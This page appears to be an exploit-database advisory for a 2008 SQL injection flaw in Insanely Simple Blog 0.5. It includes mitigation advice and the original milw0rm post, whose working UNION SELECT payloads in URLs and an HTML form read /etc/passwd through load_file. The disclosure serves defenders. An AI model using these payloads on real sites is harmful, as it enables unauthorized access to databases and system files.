Insanely Simple Blog 0.5 (index) Remote SQL Injection Vulnerabilities

vendor:

Insanely Simple Blog

by:

unohope

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Insanely Simple Blog

Affected Version From: 0.5

Affected Version To: 0.5

Patch Exists: NO

Related CWE: N/A

CPE: a:insanely_simple_blog:insanely_simple_blog

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Insanely Simple Blog 0.5 (index) Remote SQL Injection Vulnerabilities

Insanely Simple Blog 0.5 is vulnerable to remote SQL injection attacks. An attacker can exploit this vulnerability to gain access to sensitive information such as usernames and passwords stored in the database. The vulnerability is due to insufficient sanitization of user-supplied input in the 'id' and 'current_subsection' parameters of the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. Successful exploitation of this vulnerability can result in unauthorized access to the database.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized before being used in SQL statements. Additionally, the application should be configured to use the least privileged account with access to the database.

Source

Exploit-DB raw data:

  _____ _   _ _____  _____ _____ _____  
 /  ___| |_| |  _  \|  _  |  _  |_   _| 
 | (___|  _  | [_)_/| (_) | (_) | | |   
 \_____|_| |_|_| |_||_____|_____| |_|   
        C. H. R. O. O. T.  SECURITY  GROUP
        - -- ----- --- -- -- ---- --- -- - 
                     http://www.chroot.org

                          _   _ _ _____ ____ ____ __  _ 
        Hacks In Taiwan  | |_| | |_   _|  __|    |  \| |
        Conference 2008  |  _  | | | | | (__| () |     |
                         |_| |_|_| |_| \____|____|_|\__|
                                      http://www.hitcon.org


Title =======:: Insanely Simple Blog 0.5 (index) Remote SQL Injection Vulnerabilities

Author ======:: unohope [at] chroot [dot] org

IRC =========:: irc.chroot.org #chroot

ScriptName ==:: Insanely Simple Blog 

Download ====:: http://jaist.dl.sourceforge.net/sourceforge/insanelysimple2/insanely_simple_blog0.5.zip

Mirror ======:: http://www.badongo.com/file/9706939

______________________
[SQL Injection]

- {index.php} -

http://localhost/isblog/index.php?id=-99+union+select+0,1,2,3,4,5,6,load_file('/etc/passwd'),8/*

http://localhost/isblog/index.php?current_subsection=-99+union+select+0,1,2,3,4,5,6,load_file('/etc/passwd'),8/*

<form action="http://localhost/isblog/index.php?action=search" method="post">
<input type="hidden" name="term" value="-99' union select 0,1,2,3,4,5,6,load_file('/etc/passwd'),8/*">
<input type="submit" value="send">
</form>

______
[NOTE]

!! This is just for educational purposes, DO NOT use for illegal. !!

# milw0rm.com [2008-06-10]